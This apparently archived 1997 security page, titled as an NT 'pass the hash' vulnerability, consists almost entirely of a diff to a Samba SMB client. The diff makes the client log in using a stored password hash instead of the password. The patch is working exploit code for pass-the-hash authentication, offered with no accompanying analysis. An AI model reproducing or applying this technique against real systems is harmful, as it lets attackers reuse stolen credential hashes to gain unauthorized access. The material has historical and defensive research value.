|
NT "Pass the Hash" with Modified SMB Client Vulnerability
*** orig_client.c Tue Apr 8 17:27:29 1997 --- client.c Tue Apr 8 20:57:43 1997 *************** *** 3020,3026 **** {-1,NULL} }; - /**************************************************************************** send a login command ****************************************************************************/ --- 3020,3025 ---- *************** *** 3039,3044 **** --- 3038,3061 ---- int numprots; int tries=0; + #ifdef USESMBPASSWDFILE + /*TODO check for valid password and uid = getuid */ + BOOL got_encpass; + struct passwd *pwd; + struct smb_passwd *smb_pass; + unsigned char p21[21]; + + memset(p21, 0, sizeof p21); + pwd = getpwuid(getuid()); + if (pwd && (smb_pass = get_smbpwnam(pwd->pw_name))) + { + strcpy(password, "not empty"); + got_pass = got_encpass = True; + memcpy(p21, smb_pass->smb_passwd, 16); + } + setuid(getuid()); + #endif + if (was_null) { inbuf = (char *)malloc(BUFFER_SIZE + SAFETY_MARGIN); *************** *** 3189,3194 **** --- 3205,3215 ---- if (doencrypt && *pass) { DEBUG(3,("Using encrypted passwords\n")); passlen = 24; + + #ifdef USESMBPASSWDFILE + if (got_encpass) E_P24(p21,cryptkey,pword); + else + #endif SMBencrypt(pass,cryptkey,pword); } #else *************** *** 3252,3257 **** --- 3273,3281 ---- (CVAL(inbuf,smb_rcls) == ERRSRV && SVAL(inbuf,smb_err) == ERRbadpw))) { + #ifdef USESMBPASSWDFILE + got_encpass = + #endif got_pass = False; DEBUG(3,("resending login\n")); goto get_pass; |
|
 Privacy Statement |
